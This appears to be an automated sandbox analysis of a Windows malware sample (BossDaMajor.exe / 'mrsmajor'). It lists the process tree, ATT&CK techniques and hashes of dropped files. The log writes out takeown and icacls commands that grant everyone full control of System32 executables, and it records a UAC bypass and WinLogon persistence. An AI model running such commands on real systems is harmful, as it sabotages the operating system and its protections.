  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\System32\diskperf.exe"
  2⤵
  PID:372
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\System32\diskperf.exe"
    3⤵
    PID:4000
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\System32\diskperf.exe" /grant "everyone":(f)
    3⤵
    - Possible privilege escalation attempt
    PID:3980
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\System32\diskraid.exe"
  2⤵
  PID:3748
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\System32\diskraid.exe"
    3⤵
    - Possible privilege escalation attempt
    PID:6120
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 6120 -s 380
      4⤵
      Program crash
      PID:356
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\System32\diskraid.exe" /grant "everyone":(f)
    3⤵
    PID:3444
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\System32\Dism\DismHost.exe"
  2⤵
  PID:4188
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\System32\Dism\DismHost.exe"
    3⤵
    PID:1696
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1696 -s 244
      4⤵
      Program crash
      PID:4528
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\System32\Dism\DismHost.exe" /grant "everyone":(f)
    3⤵
    PID:5500
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\System32\Dism.exe"
  2⤵
  PID:2868
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\System32\Dism.exe"
    3⤵
    PID:5708
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5708 -s 376
      4⤵
      Program crash
      PID:4264
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4264 -s 1508
        5⤵
        Program crash
        
        PID:5876
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\System32\Dism.exe" /grant "everyone":(f)
    3⤵
    - Possible privilege escalation attempt
    PID:4660
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\System32\dllhost.exe"
  2⤵
  PID:4004
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\System32\dllhost.exe"
    3⤵
    PID:4532
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4532 -s 220
      4⤵
      Program crash
      PID:2676
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\System32\dllhost.exe" /grant "everyone":(f)
    3⤵
    PID:5392
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\System32\dllhst3g.exe"
  2⤵
  PID:6132

C:\Windows\msagent\AgentSvr.exe
C:\Windows\msagent\AgentSvr.exe -Embedding
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:2240

C:\Windows\explorer.exe
explorer.exe
1⤵
- Boot or Logon Autostart Execution: Active Setup
- Enumerates connected drives
- Checks SCSI registry key(s)
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:4272
- C:\Windows\system32\rundll32.exe
  "C:\Windows\system32\rundll32.exe" shell32.dll,Control_RunDLL mmsys.cpl,,recording
  2⤵
  - Suspicious behavior: GetForegroundWindowSpam
  PID:1400
- C:\Program Files\Mozilla Firefox\firefox.exe
  "C:\Program Files\Mozilla Firefox\firefox.exe"
  2⤵
  PID:3436
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe"
    3⤵
    - Subvert Trust Controls: Mark-of-the-Web Bypass
    - Checks processor information in registry
    - NTFS ADS
    - Suspicious use of SetWindowsHookEx
    PID:380
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="380.0.1678344221\405683681" -parentBuildID 20221007134813 -prefsHandle 1608 -prefMapHandle 1596 -prefsLen 21569 -prefMapSize 233863 -appDir "C:\Program Files\Mozilla Firefox\browser" - {087bbcc3-a919-4519-b2f9-beedcd9aec64} 380 "\\.\pipe\gecko-crash-server-pipe.380" 1584 1b211bfc358 gpu
      4⤵
      PID:5268
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="380.1.909948615\1886598924" -parentBuildID 20221007134813 -prefsHandle 1980 -prefMapHandle 1976 -prefsLen 21614 -prefMapSize 233863 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f70b0025-dae3-4e5d-b59b-504e2db74a36} 380 "\\.\pipe\gecko-crash-server-pipe.380" 1992 1b211836758 socket
      4⤵
      PID:3408
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="380.2.1342256083\2101146066" -childID 1 -isForBrowser -prefsHandle 2660 -prefMapHandle 2656 -prefsLen 22075 -prefMapSize 233863 -jsInitHandle 1264 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {841af1fc-6f8e-477a-80c7-f9cc831baa27} 380 "\\.\pipe\gecko-crash-server-pipe.380" 2564 1b21563d258 tab
      4⤵
      PID:1404
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="380.3.1609289948\1653142719" -childID 2 -isForBrowser -prefsHandle 1048 -prefMapHandle 1044 -prefsLen 27253 -prefMapSize 233863 -jsInitHandle 1264 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {27916f65-6d5f-4cf6-809c-c33075cb046d} 380 "\\.\pipe\gecko-crash-server-pipe.380" 3264 1b216a26c58 tab
      4⤵
      PID:1684
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="380.4.1918870375\214122610" -childID 3 -isForBrowser -prefsHandle 3724 -prefMapHandle 3384 -prefsLen 27253 -prefMapSize 233863 -jsInitHandle 1264 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {be923101-4b7b-4309-a1e3-d31a5ec145ee} 380 "\\.\pipe\gecko-crash-server-pipe.380" 3736 1b216a75a58 tab
      4⤵
      PID:5208
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="380.5.2074285098\475235479" -childID 4 -isForBrowser -prefsHandle 4556 -prefMapHandle 4552 -prefsLen 27253 -prefMapSize 233863 -jsInitHandle 1264 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {32c4fa56-79d4-49cc-9096-f8ecbed2e4b8} 380 "\\.\pipe\gecko-crash-server-pipe.380" 4564 1b206b2d858 tab
      4⤵
      PID:3464
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="380.6.1536103371\1226553220" -childID 5 -isForBrowser -prefsHandle 4696 -prefMapHandle 4700 -prefsLen 27253 -prefMapSize 233863 -jsInitHandle 1264 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {e9701d1f-14ed-4fe4-9b1c-98313f6121ab} 380 "\\.\pipe\gecko-crash-server-pipe.380" 4688 1b215cd1258 tab
      4⤵
      PID:4568
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="380.7.895941649\1379307511" -childID 6 -isForBrowser -prefsHandle 4884 -prefMapHandle 4888 -prefsLen 27253 -prefMapSize 233863 -jsInitHandle 1264 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {03563eaa-3b8f-438c-80a7-7548b6e61f77} 380 "\\.\pipe\gecko-crash-server-pipe.380" 4876 1b217dc4b58 tab
      4⤵
      PID:4604
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="380.8.645366651\167775410" -childID 7 -isForBrowser -prefsHandle 5348 -prefMapHandle 5344 -prefsLen 27253 -prefMapSize 233863 -jsInitHandle 1264 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {d240a0a3-baa3-4e7c-9eed-e7bc229acf28} 380 "\\.\pipe\gecko-crash-server-pipe.380" 5356 1b2191e5158 tab
      4⤵
      PID:4440
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="380.9.1003873113\701872801" -childID 8 -isForBrowser -prefsHandle 5600 -prefMapHandle 5596 -prefsLen 27253 -prefMapSize 233863 -jsInitHandle 1264 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {b1953291-bfee-4b64-947b-3d9a2fbab2c0} 380 "\\.\pipe\gecko-crash-server-pipe.380" 3796 1b2194f0158 tab
      4⤵
      PID:2820
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="380.10.941994896\2101166820" -childID 9 -isForBrowser -prefsHandle 4232 -prefMapHandle 2268 -prefsLen 27262 -prefMapSize 233863 -jsInitHandle 1264 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {8e524e38-2e01-4033-a3b7-9fb6e998b587} 380 "\\.\pipe\gecko-crash-server-pipe.380" 5556 1b21924d058 tab
      4⤵
      PID:2196
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="380.11.204465746\420267666" -childID 10 -isForBrowser -prefsHandle 5300 -prefMapHandle 3736 -prefsLen 27262 -prefMapSize 233863 -jsInitHandle 1264 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {a4ebd775-bb5a-472f-be76-2b6b8933f714} 380 "\\.\pipe\gecko-crash-server-pipe.380" 5268 1b219e3f858 tab
      4⤵
      PID:2720
- C:\Users\Admin\Downloads\BossDaMajor.exe
  "C:\Users\Admin\Downloads\BossDaMajor.exe"
  2⤵
  - Executes dropped EXE
  PID:2328
- - C:\Windows\System32\wscript.exe
    "C:\Windows\sysnative\wscript.exe" C:\Users\Admin\AppData\Local\Temp\929A.tmp\929B.vbs
    3⤵
    - Drops file in Program Files directory
    PID:3636
  - - C:\Windows\System32\notepad.exe
      "C:\Windows\System32\notepad.exe"
      4⤵
      PID:4364
  - - C:\Windows\System32\wscript.exe
      "C:\Windows\System32\wscript.exe" "C:\Program files\mrsmajor\mrsmajorlauncher.vbs" RunAsAdministrator
      4⤵
      Modifies WinLogon for persistence
      UAC bypass
      Disables RegEdit via registry modification
      Modifies system executable filetype association
      Access Token Manipulation: Create Process with Token
      Modifies Control Panel
      Modifies registry class
      System policy modification
      PID:3320
    - - C:\Program Files (x86)\Windows Media Player\wmplayer.exe
        
        "C:\Program Files (x86)\Windows Media Player\wmplayer.exe" "C:\Program Files\mrsmajor\def_resource\f11.mp4"
        5⤵
        
        PID:5096
      - C:\Program Files (x86)\Windows Media Player\setup_wm.exe
        
        "C:\Program Files (x86)\Windows Media Player\setup_wm.exe" /RunOnce:"C:\Program Files (x86)\Windows Media Player\wmplayer.exe" "C:\Program Files\mrsmajor\def_resource\f11.mp4"
        6⤵
        
        PID:5080
      - C:\Windows\SysWOW64\unregmp2.exe
        
        "C:\Windows\System32\unregmp2.exe" /AsyncFirstLogon
        6⤵
        
        PID:5500
        
        C:\Windows\System32\unregmp2.exe
        
        "C:\Windows\SysNative\unregmp2.exe" /AsyncFirstLogon /REENTRANT
        7⤵
        Enumerates connected drives
        
        PID:5652
    - - C:\Windows\System32\shutdown.exe
        
        "C:\Windows\System32\shutdown.exe" -r -t 03
        5⤵
        
        PID:4360

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k WerSvcGroup
1⤵
PID:5520

C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
"C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe" -ServerName:CortanaUI.AppXa50dqqa5gqv4a428c9y1jjw7m3btvepj.mca
1⤵
- Enumerates system info in registry
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:2152

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
1⤵
PID:3572

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:6036

C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x0 /state0:0xa3a48055 /state1:0x41c64e6d
1⤵
PID:1108

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Active Setup

T1547.014

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Event Triggered Execution

T1546

Accessibility Features

T1546.008

AppInit DLLs

T1546.010

Change Default File Association

T1546.001

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Access Token Manipulation

T1134

Create Process with Token

T1134.002

Boot or Logon Autostart Execution

T1547

Active Setup

T1547.014

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Event Triggered Execution

T1546

Accessibility Features

T1546.008

AppInit DLLs

T1546.010

Change Default File Association

T1546.001

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Access Token Manipulation

T1134

Create Process with Token

T1134.002

File and Directory Permissions Modification

T1222

Windows File and Directory Permissions Modification

T1222.001

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Subvert Trust Controls

T1553

SIP and Trust Provider Hijacking

T1553.003

Credential Access

Discovery

Network Share Discovery

T1135

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files (x86)\BonziBuddy432\ActiveSkin.ocx

Filesize
336KB

MD5
3d225d8435666c14addf17c14806c355

SHA1
262a951a98dd9429558ed35f423babe1a6cce094

SHA256
2c8f92dc16cbf13542ddd3bf0a947cf84b00fed83a7124b830ddefa92f939877

SHA512
391df24c6427b4011e7d61b644953810e392525743914413c2e8cf5fce4a593a831cfab489fbb9517b6c0e7ef0483efb8aeaad0a18543f0da49fa3125ec971e1

Download Submit
C:\Program Files (x86)\BonziBuddy432\BonziBDY_2.EXE

Filesize
796KB

MD5
8a30bd00d45a659e6e393915e5aef701

SHA1
b00c31de44328dd71a70f0c8e123b56934edc755

SHA256
1e2994763a7674a0f1ec117dae562b05b614937ff61c83b316b135afab02d45a

SHA512
daf92e61e75382e1da0e2aba9466a9e4d9703a129a147f0b3c71755f491c68f89ad67cfb4dd013580063d664b69c8673fb52c02d34b86d947e9f16072b7090fb

Download Submit
C:\Program Files (x86)\BonziBuddy432\BonziBDY_35.EXE

Filesize
2.5MB

MD5
73feeab1c303db39cbe35672ae049911

SHA1
c14ce70e1b3530811a8c363d246eb43fc77b656c

SHA256
88c03817ae8dfc5fc9e6ffd1cfb5b829924988d01cd472c1e64952c5398866e8

SHA512
73f37dee83664ce31522f732bf819ed157865a2a551a656a7a65d487c359a16c82bd74acff2b7a728bb5f52d53f4cfbea5bef36118128b0d416fa835053f7153

Download Submit
C:\Program Files (x86)\BonziBuddy432\BonziBDY_4.EXE

Filesize
3.2MB

MD5
93f3ed21ad49fd54f249d0d536981a88

SHA1
ffca7f3846e538be9c6da1e871724dd935755542

SHA256
5678fd744faddb30a87568ae309066ef88102a274fff62f10e4963350da373bc

SHA512
7923556c6d6feb4ff4253e853bae3675184eab9b8ce4d4e07f356c8624317801ee807ad5340690196a975824ea3ed500ce6a80c7670f19785139be594fa5e70f

Download Submit
C:\Program Files (x86)\BonziBuddy432\BonziCheckers.ocx

Filesize
152KB

MD5
66551c972574f86087032467aa6febb4

SHA1
5ad1fe1587a0c31bb74af20d09a1c7d3193ec3c9

SHA256
9028075603c66ca2e906ecac3275e289d8857411a288c992e8eef793ed71a75b

SHA512
35c1f500e69cdd12ec6a3c5daef737a3b57b48a44df6c120a0504d340e0f721d34121595ed396dc466a8f9952a51395912d9e141ad013000f5acb138b2d41089

Download Submit
C:\Program Files (x86)\BonziBuddy432\Books\Bonzi and the Internet\page17.jpg

Filesize
50KB

MD5
e8f52918072e96bb5f4c573dbb76d74f

SHA1
ba0a89ed469de5e36bd4576591ee94db2c7f8909

SHA256
473a890da22defb3fbd643246b3fa0d6d34939ac469cd4f48054ee2a0bc33d82

SHA512
d57dd0a9686696487d268ef2be2ec2d3b97baedf797a63676da5a8a4165cda89540ec2d3b9e595397cbf53e69dcce76f7249f5eeff041947146ca7bf4099819f

Download Submit
C:\Program Files (x86)\BonziBuddy432\Books\Bonzi and the Internet\page18.jpg

Filesize
45KB

MD5
108fd5475c19f16c28068f67fc80f305

SHA1
4e1980ba338133a6fadd5fda4ffe6d4e8a039033

SHA256
03f269cd40809d7ec94f5fa4fff1033a624e849179962693cdc2c37d7904233b

SHA512
98c8743b5af89ec0072b70de8a0babfb5aff19bafa780d6ce99c83721b65a80ec310a4fe9db29a4bb50c2454c34de62c029a83b70d0a9df9b180159ea6cad83a

Download Submit
C:\Program Files (x86)\BonziBuddy432\MSINET.OCX

Filesize
112KB

MD5
7bec181a21753498b6bd001c42a42722

SHA1
3249f233657dc66632c0539c47895bfcee5770cc

SHA256
73da54b69911bdd08ea8bbbd508f815ef7cfa59c4684d75c1c602252ec88ee31

SHA512
d671e25ae5e02a55f444d253f0e4a42af6a5362d9759fb243ad6d2c333976ab3e98669621ec0850ad915ee06acbe8e70d77b084128fc275462223f4f5ab401bc

Download Submit
C:\Program Files (x86)\BonziBuddy432\MSVBVM60.DLL

Filesize
1.3MB

MD5
5343a19c618bc515ceb1695586c6c137

SHA1
4dedae8cbde066f31c8e6b52c0baa3f8b1117742

SHA256
2246b4feae199408ea66d4a90c1589026f4a5800ce5a28e583b94506a8a73dce

SHA512
708d8a252a167fa94e3e1a49e2630d07613ff75a9a3e779a0c1fcbec44aa853a68c401f31a2b84152f46a05f7d93f4e5e502afc7a60236a22ac58dea73fa5606

Download Submit
C:\Program Files (x86)\BonziBuddy432\Reg.nbd

Filesize
140B

MD5
a8ed45f8bfdc5303b7b52ae2cce03a14

SHA1
fb9bee69ef99797ac15ba4d8a57988754f2c0c6b

SHA256
375ecd89ee18d7f318cf73b34a4e15b9eb16bc9d825c165e103db392f4b2a68b

SHA512
37917594f22d2a27b3541a666933c115813e9b34088eaeb3d74f77da79864f7d140094dfac5863778acf12f87ccda7f7255b7975066230911966b52986da2d5c

Download Submit
C:\Program Files (x86)\BonziBuddy432\Reg.nbd

Filesize
157B

MD5
85a0b2d19d4fe1cbf2213fed9fc52a01

SHA1
b316ff30be4ba4d7dea15e0967bbe4a6330e2a74

SHA256
26a30d04e93a119ec41b923998cd0ca8ee0986d3c3b0d19421df3cac34a4c193

SHA512
0987a57cc3f37c18b74439c455ffcea55d0b32de6e92d5b78e5c542a07bd84222836ed5882f45ce399b9a9b33e778bd646e9eec1424fb5c0e4280bd1630bcbf1

Download Submit
C:\Program Files (x86)\BonziBuddy432\Regicon.ocx

Filesize
76KB

MD5
32ff40a65ab92beb59102b5eaa083907

SHA1
af2824feb55fb10ec14ebd604809a0d424d49442

SHA256
07e91d8ed149d5cd6d48403268a773c664367bce707a99e51220e477fddeeb42

SHA512
2cfc5c6cb4677ff61ec3b6e4ef8b8b7f1775cbe53b245d321c25cfec363b5b4975a53e26ef438e07a4a5b08ad1dde1387970d57d1837e653d03aef19a17d2b43

Download Submit
C:\Program Files (x86)\BonziBuddy432\Runtimes\CheckRuntimes.bat

Filesize
279B

MD5
4877f2ce2833f1356ae3b534fce1b5e3

SHA1
7365c9ef5997324b73b1ff0ea67375a328a9646a

SHA256
8ae1ed38bc650db8b14291e1b7298ee7580b31e15f8a6a84f78f048a542742ff

SHA512
dd43ede5c3f95543bcc8086ec8209a27aadf1b61543c8ee1bb3eab9bc35b92c464e4132b228b12b244fb9625a45f5d4689a45761c4c5263aa919564664860c5e

Download Submit
C:\Program Files (x86)\BonziBuddy432\Runtimes\MSAGENT.EXE

Filesize
391KB

MD5
66996a076065ebdcdac85ff9637ceae0

SHA1
4a25632b66a9d30239a1a77c7e7ba81bb3aee9ce

SHA256
16ca09ad70561f413376ad72550ae5664c89c6a76c85c872ffe2cb1e7f49e2aa

SHA512
e42050e799cbee5aa4f60d4e2f42aae656ff98af0548308c8d7f0d681474a9da3ad7e89694670449cdfde30ebe2c47006fbdc57cfb6b357c82731aeebc50901c

Download Submit
C:\Program Files (x86)\BonziBuddy432\Runtimes\tv_enua.exe

Filesize
997KB

MD5
3f8f18c9c732151dcdd8e1d8fe655896

SHA1
222cc49201aa06313d4d35a62c5d494af49d1a56

SHA256
709936902951fb684d0a03a561fb7fd41c5e6f81ecd60d326809db66eb659331

SHA512
398a83f030824011f102dbcf9b25d3ff7527c489df149e9acdb492602941409cf551d16f6f03c01bc6f63a2e94645ed1f36610bdaffc7891299a8d9f89c511f7

Download Submit
C:\Program Files (x86)\BonziBuddy432\SSCALA32.OCX

Filesize
472KB

MD5
ce9216b52ded7e6fc63a50584b55a9b3

SHA1
27bb8882b228725e2a3793b4b4da3e154d6bb2ea

SHA256
8e52ef01139dc448d1efd33d1d9532f852a74d05ee87e8e93c2bb0286a864e13

SHA512
444946e5fc3ea33dd4a09b4cbf2d41f52d584eb5b620f5e144de9a79186e2c9d322d6076ed28b6f0f6d0df9ef4f7303e3901ff552ed086b70b6815abdfc23af7

Download Submit
C:\Program Files (x86)\BonziBuddy432\SSCALB32.OCX

Filesize
320KB

MD5
97ffaf46f04982c4bdb8464397ba2a23

SHA1
f32e89d9651fd6e3af4844fd7616a7f263dc5510

SHA256
5db33895923b7af9769ca08470d0462ed78eec432a4022ff0acc24fa2d4666e1

SHA512
8c43872396f5dceb4ba153622665e21a9b52a087987eab523b1041031e294687012d7bf88a3da7998172010eae5f4cc577099980ecd6b75751e35cfc549de002

Download Submit
C:\Program Files (x86)\BonziBuddy432\Uninstall.exe

Filesize
65KB

MD5
068ace391e3c5399b26cb9edfa9af12f

SHA1
568482d214acf16e2f5522662b7b813679dcd4c7

SHA256
2288f4f42373affffbaa63ce2fda9bb071fd7f14dbcd04f52d3af3a219b03485

SHA512
0ba89fcdbb418ea6742eeb698f655206ed3b84c41ca53d49c06d30baed13ac4dfdb4662b53c05a28db0a2335aa4bc588635b3b205cfc36d8a55edfc720ac4b03

Download Submit
C:\Program Files (x86)\BonziBuddy432\ssa3d30.ocx

Filesize
320KB

MD5
48c35ed0a09855b29d43f11485f8423b

SHA1
46716282cc5e0f66cb96057e165fa4d8d60fbae2

SHA256
7a0418b76d00665a71d13a30d838c3e086304bacd10d764650d2a5d2ec691008

SHA512
779938ec9b0f33f4cbd5f1617bea7925c1b6d794e311737605e12cd7efa5a14bbc48bee85208651cf442b84133be26c4cc8a425d0a3b5b6ad2dc27227f524a99

Download Submit
C:\Program Files (x86)\BonziBuddy432\sstabs2.ocx

Filesize
288KB

MD5
7303efb737685169328287a7e9449ab7

SHA1
47bfe724a9f71d40b5e56811ec2c688c944f3ce7

SHA256
596f3235642c9c968650194065850ecb02c8c524d2bdcaf6341a01201e0d69be

SHA512
e0d9cb9833725e0cdc7720e9d00859d93fc51a26470f01a0c08c10fa940ed23df360e093861cf85055b8a588bb2cac872d1be69844a6c754ac8ed5bfaf63eb03

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Media Player\CurrentDatabase_400.wmdb

Filesize
512KB

MD5
293f7dcac2b59dd9d2559c2d153e5b4e

SHA1
5dfdfbcb4f814eff553192e77366897c3ff4faa6

SHA256
9305ae0a1cb5d7901dafbdda4adf519efebb75ba8322d490074fef46f1ffb36f

SHA512
cc36bb6e738ac6182e996718151f1bcec2a0588c4df96610fcc19f7112bb60c849b69a0f9158f8ab41452e7858335bb4c0f395e0e0f0aa953b9af1467bd11b90

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows Media\12.0\WMSDKNS.XML

Filesize
9KB

MD5
7050d5ae8acfbe560fa11073fef8185d

SHA1
5bc38e77ff06785fe0aec5a345c4ccd15752560e

SHA256
cb87767c4a384c24e4a0f88455f59101b1ae7b4fb8de8a5adb4136c5f7ee545b

SHA512
a7a295ac8921bb3dde58d4bcde9372ed59def61d4b7699057274960fa8c1d1a1daff834a93f7a0698e9e5c16db43af05e9fd2d6d7c9232f7d26ffcff5fc5900b

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\c5nsco79.default-release\cache2\doomed\19468

Filesize
13KB

MD5
27e6eba0c6e8b2ebf7d68e5023ae9e10

SHA1
6200157a55ef817bb28132f2cef482e818ba35eb

SHA256
10efab29ed325a1b1accea00ac5a60c3ea02ba9a26d77ce14995c3fd0cb2fb96

SHA512
a1d4d869403770160190a24f9122fbe0bbd68df86e7fd57386d25050b6bb91b1f4dda855615b0b094ad046031361174e2a8c69afb5c4722ab7beb84e01ecfa68

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\c5nsco79.default-release\cache2\doomed\8917

Filesize
62KB

MD5
558201c68e8f04d651cb514087a05bc2

SHA1
bf22e91461677dd47b5d149d8532ae0608c367ce

SHA256
cd139d5176c510ac7945d6a831bb487195da2fd0418326e355d5229cf82856ed

SHA512
aca85e2988b00757aaaccef5c70d3989fa7cafc7913d7d1ec6e65d005374dbf0c925832778adfaf3c038345b498306b2286ea0d32ff5f2b1d3a6d611af659683

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\c5nsco79.default-release\cache2\doomed\9110

Filesize
13KB

MD5
75822aefd951b6fc37e9debd97810c4b

SHA1
434b928adec702619196c5bfab08ae4a644bb5fb

SHA256
97c4a83ab27e4af44bf7a2ccc981c3bffa5eac727dffba66024b55ac4bcbc959

SHA512
8ab9b2b27b60fe0b8211e698e18dcbd4cedde4870ccd9a56a3e57bc8e8fc8cb7091549364187f1d69427a3ffa7d23706c20979e755dd2937d13bfb0605812439

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\c5nsco79.default-release\cache2\entries\05BAD909E03B7D83C31940E39F258BD8A394A9BB

Filesize
305KB

MD5
e71ab43ef8118dfcad3b87198600ed15

SHA1
7955fec134836a034445d03fa2f899ffe1824c96

SHA256
13ebae216eca3308bdc1138d040aae786ac676805981a890d77e076608332008

SHA512
6f5a6233f5b6fa96c54852ccaad6fcb29c792a3012fb4f2131495260d43f85702f69009ef48f553c8f932a33f7d9f7531df8c67ac27d6888e156d395c89cd288

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\c5nsco79.default-release\cache2\entries\0A14640657965B8513D3F26C8B0E6802EF353192

Filesize
13KB

MD5
46f48ad12d2faf2a9bd070de6ffc08b7

SHA1
2d93a4c43573b32818300fd4ead1e65ab8b22b96

SHA256
ef32add2b051a14861cc4e33eef08bc53a64116c01b91fd3320b76818ba2064b

SHA512
6ada8877fe25f44ab1e6bfe1caace02a928a572a67fad032cdeea0ff47c37a52023b36473d2a3fc31f61694dfa45415f21a57c6a25418550479974d2ed254960

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\c5nsco79.default-release\cache2\entries\0B6138FE0EB440EA1687E754D3D1F4EC6F0169DE

Filesize
66KB

MD5
4ce247edf698b501a525da57a2751772

SHA1
2a4cfcda9de72fc1b4c05167de385cd2010f7677

SHA256
27ec783e4da179871693bbbcfcd9a739495c635388a217a26748d8a56f97901b

SHA512
768950c41d7ac2bc77f1700797dd57c942b23b3539ddfdadca1f4ac35a2f3df43df8939f5f6d6c8a1a521b2ca22db0574208be3095ec8eb9165bb0d8db327dce

Download Submit
